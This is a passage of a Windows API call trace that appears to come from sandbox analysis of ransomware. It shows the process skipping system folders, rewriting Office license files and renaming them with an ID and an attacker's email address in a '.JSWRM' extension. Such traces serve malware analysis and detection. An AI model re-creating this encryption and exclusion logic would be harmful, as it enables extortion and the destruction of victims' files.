(lpString1="StandardR_Trial-ppd.xrm-ms", lpString2="msocache") returned 1 [0110.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0110.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Trial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0110.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0110.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Trial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241268, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0110.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0110.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0110.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Trial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0110.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0110.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Trial-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240fc0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0110.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0110.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0110.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0110.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0110.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.474] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22641) returned 1 [0110.474] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5870) returned 0x24c1d0 [0110.474] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5870, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5870, lpOverlapped=0x0) returned 1 [0110.484] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.484] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5870, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5870, lpOverlapped=0x0) returned 1 [0110.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.484] CloseHandle (hObject=0x45c) returned 1 [0110.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0110.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0110.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0110.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0110.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0110.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0110.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0110.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0110.485] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0110.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0110.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0110.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0110.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0110.486] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb785126, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb785126, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb8901d2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d51, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardR_Trial-ul-oob.xrm-ms", cAlternateFileName="ST6E36~1.XRM")) returned 1 [0110.486] lstrcmpiW (lpString1="StandardR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0110.486] lstrcmpiW (lpString1="StandardR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0110.486] lstrcmpiW (lpString1="StandardR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0110.486] lstrcmpiW (lpString1="StandardR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0110.486] lstrcmpiW (lpString1="StandardR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0110.486] lstrcmpiW (lpString1="StandardR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0110.486] lstrcmpiW (lpString1="StandardR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0110.486] lstrcmpiW (lpString1="StandardR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.486] lstrcmpiW (lpString1="StandardR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0110.486] lstrcmpiW (lpString1="StandardR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0110.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0110.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Trial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0110.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0110.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Trial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0110.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0110.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0110.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Trial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0110.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0110.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Trial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241038, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0110.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0110.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0110.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0110.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0110.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.487] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11601) returned 1 [0110.487] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0110.488] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0110.490] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.490] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0110.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.490] CloseHandle (hObject=0x45c) returned 1 [0110.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0110.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0110.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0110.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0110.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0110.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0110.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.490] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0110.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0110.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0110.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0110.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0110.492] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeba59def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeba59def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebaf2760, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x21a2, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="STB22D~1.XRM")) returned 1 [0110.492] lstrcmpiW (lpString1="StandardVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0110.492] lstrcmpiW (lpString1="StandardVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0110.492] lstrcmpiW (lpString1="StandardVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0110.492] lstrcmpiW (lpString1="StandardVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0110.492] lstrcmpiW (lpString1="StandardVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned 1 [0110.492] lstrcmpiW (lpString1="StandardVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned 1 [0110.492] lstrcmpiW (lpString1="StandardVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0110.492] lstrcmpiW (lpString1="StandardVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.492] lstrcmpiW (lpString1="StandardVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned -1 [0110.492] lstrcmpiW (lpString1="StandardVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned 1 [0110.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0110.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_KMS_Client-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0110.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_KMS_Client-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0110.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0110.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0110.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_KMS_Client-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0110.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_KMS_Client-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0110.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0110.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0110.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0110.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0110.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.493] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=8610) returned 1 [0110.493] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x21a0) returned 0x205850 [0110.493] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x21a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x21a0, lpOverlapped=0x0) returned 1 [0110.495] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.495] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x21a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x21a0, lpOverlapped=0x0) returned 1 [0110.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0110.495] CloseHandle (hObject=0x45c) returned 1 [0110.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0110.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0110.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0110.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0110.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0110.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0110.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0110.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0110.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0110.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0110.496] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0110.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0110.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0110.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.497] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb843cf3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb843cf3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb99b231, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="STD2C9~1.XRM")) returned 1 [0110.497] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0110.497] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0110.497] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 